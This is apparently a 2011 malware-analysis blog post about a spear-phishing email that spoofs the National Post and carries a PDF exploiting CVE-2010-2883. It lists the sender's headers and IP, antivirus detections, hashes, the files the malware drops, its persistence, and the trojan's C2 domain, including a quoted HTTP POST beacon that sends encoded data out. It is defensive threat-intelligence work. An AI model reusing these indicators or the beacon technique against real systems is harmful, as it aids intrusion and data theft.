Tuesday, May 31, 2011

May 17 CVE-2010-2883 PDF Bin Laden's successor from spoofed Nationalpost.com

SIZE 103981 bytes
EXPLOIT TYPE         CVE-2010-2883
FILE NAME             Bin Ladens successor.pdf

Post Updates

The file uses Fonts/SING CVE_2010-2883 exploit, which does not seem to be metasploit generated.

The sender is often uses compromised servers of different organizations
    *     Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce

    *     Jan 12 CVE-2010-3654 + CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 PDF JANUARY 2011 from a compromised Thai Police account

     It is unclear whether this time it is a compromised server or the attacker uses the services of this internet provider as a customer    

    Beyond the Network America, Inc. (BTNaccess) is a wholly owned subsidiary of PCCW, and is headquartered in Reston, Virginia and Hong Kong with offices in Los Angeles, New York City, Philadelphia, Houston, London, Moscow, Prague, Kuala Lumpur, Singapore, Shenzhen, Tokyo, Mumbai and New Delhi.

    PCCW, a global leader in next generation broadband solutions, is the largest telecommunications provider in Hong Kong. PCCW is the operator of one of the world’s most advanced broadband networks and has over 700,000 broadband customers and 12,500 employees worldwide. As a global player, PCCW has portrayed innovation within the industry and demonstrated financial stability with 2003 revenues reaching US$2.89 billion.


    Original Message

    -----Original Message-----
    From: Peter Goodspeed [mailto:gpeter@nationalpost.com]
    Sent: Monday, May 16, 2011 10:02 PM
    To: xxxxxxxxxxx
    Subject: Bin Laden’s successor may launch new strike


    Wellcome to Subscribe our Journals.Please find attached the analysis

    of "Bin Laden¡¯s successor may launch new strike".

    Best regards,

    National Post
    Peter Goodspeed
    1450 Don Mills Road, Suite 300
    Don Mills, Ontario
    M3B 3R5

    Message Headers

    Received: (qmail 10512 invoked from network); 17 May 2011 02:00:58 -0000
    Received: from unknown (HELO nationalpost.com) (
      by xxxxxxxxxx with SMTP; 17 May 2011 02:00:58 -0000
    From: "Peter Goodspeed"
    Subject: Bin =?GB2312?B?TGFkZW6hr3M=?= successor may launch new strike
    To: xxxxxxxxxxxxxxxx
    Content-Type: multipart/mixed;
        boundary="=_NextPart_2rfkindysadvnqw3nerasdf"; charset="GB2312"
    MIME-Version: 1.0
    Reply-To: gpeter@nationalpost.com
    Date: Tue, 17 May 2011 10:01:40 +0800
    X-Priority: 3
    X-Mailer: FoxMail 3.11 Release [cn]

    Sender IP

    Beyond the Network America in Hong Kong
    Host reachable, 252 ms. average -

    Beyond The Network America, Inc.
    450 Springpark PL
    Suite 100
    United States

    Downes, Chris

    PCCW AUP Department
    ISP:    Beyond The Network America
    Organization:    Beyond The Network America
    Proxy:    None detected
    Type:    Corporate
    Assignment:    Static IP
    Geolocation Information
    Country:    Hong Kong 
    City:    Hong Kong   

    Nationalpost.com was spoofed, the real hosting location of this domain is in Canada
    Postmedia Network Inc.
    Peter deGroot
    1450 Don Mills Rd.
    Toronto, ON M3B 2X7
    Phone: 1 905 3042195 ()
    Fax..: 1 905 3042195
    Email: Webnames@postmedia.com

    Automated Scans

    File name: Bin Laden

    Submission date: 2011-05-31 11:28:53 (UTC)
    Result: 16/ 42 (38.1%)
    AntiVir 2011.05.31 EXP/CVE-2010-2883.F
    Antiy-AVL 2011.05.31 Exploit/Win32.Pidief
    Avast 4.8.1351.0 2011.05.31 JS:Pdfka-gen
    Avast5 5.0.677.0 2011.05.31 JS:Pdfka-gen
    ClamAV 2011.05.31 PUA.Script.PDF.EmbeddedJS
    Commtouch 2011.05.31 PDF/Obfusc.J!Camelot
    Comodo 8902 2011.05.31 UnclassifiedMalware
    DrWeb 2011.05.31 Exploit.PDF.2197
    eTrust-Vet 36.1.8358 2011.05.31 PDF/Pidief!generic
    F-Prot 2011.05.30 JS/ShellCode.DF.gen
    Fortinet 2011.05.31 PDF/CoolType!exploit.CVE20102883
    GData 22 2011.05.31 JS:Pdfka-gen 
    Ikarus T3. 2011.05.31 Exploit.PDF
    Microsoft 1.6903 2011.05.31 Exploit:Win32/CVE-2010-2883.A
    Sophos 4.65.0 2011.05.31 Mal/PDFJs-Z

    MD5   : 8e633588b3ee59de09fe126d99869d2d

    Created files and traffic

     the payload is the same type of trojan described 

    Created files
    C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.dll     MD5:   5D4877E3603149372CA210A8D2B60492
    C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.exe     MD5:  4353E469D8B4A7BAE876C81D3CAAA0D1
    C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe             MD5:  4353E469D8B4A7BAE876C81D3CAAA0D1
    C:\Documents and Settings\All Users\Application Data\desktop.BIN ``            MD5:  4353E469D8B4A7BAE876C81D3CAAA0D1
     The traffic is also analyzed in the mentioned post
    # The persistence is achieved via relaunching the binary from  the infected user startup folder (Start Menu\Programs\Startup\userinit.exe), also the there is a copy of the file gets created as All Users\Application Data\desktop.BIN
    # Userinit.exe creates  folder logs in %userprofile%\Local Settings\Application Data\Windows\Logs. A shortcut like in the image below shows up in that directory for a split second but I did not capture it. This is the file that gets transmitted with HTTP POST, M​DAwMGhIR​UwuMDk in meta part of the URL string can be decoded as meta=0000hHEL.09

        **POST /wi​ndowsupd​atev7/se​arch%3Fh​l%3DSABB​AE4AUwA%​3D%26q%3​DMQA5ADI​ ALgAxADY​AOAAuADI​ALgAyAA%​3D%3D%26​meta%3DM​DAwMGhIR​UwuMDk%3​D%26id%3​ Dlfdxfir​cvscxggb​ HTTP/1.​1.

    The last part -lfdxfir​cvscxggb​ - is changing with each GET request and is possibly an encoded directories names on the victim pc

    C2 information 
    DNS queries and traffic to

    www.offlinewebpage.com    HTTP    POST /qduxwfnfozvsrtkjprepggxrpnrvyst.htm HTTP/1.1 
    Reverse IP Lookup Results—3 domains hosted on IP address
    Web Site

       Updated Date: 2010-10-05
       Creation Date: 2010-10-05
       Expiration Date: 2012-10-05
        david Boulevard
        No.17 Ren Rd. zonn District, fifa, akai 116001
            bb aa 116001
            Phone: +86.075184562547 Fax: +86.075184562547
    Administrative Contact:
        david Boulevard new delphi qingwa20112011@163.com
        No.17 Ren Rd. zonn District, fifa, akai 116001

    Registrar of Record: NAME2HOST, INC.
    Domain servers in listed order:

    IP Address History
    Event Date     Action     Pre-Action IP     Post-Action IP
    2010-10-06     New     -none-
    2011-03-18     Change
    2011-04-10     New     -none-

    Traffic to 
    inetnum: -
    ISP:    China Unicom Beijing Province Network
    Organization:    China Unicom Beijing Province Network
    Proxy:    None detected
    Type:    Broadband
    Assignment:    Static IP
    Country:    China
    State/Region:    Beijing
    City:    Beijing

    No comments:

    Post a Comment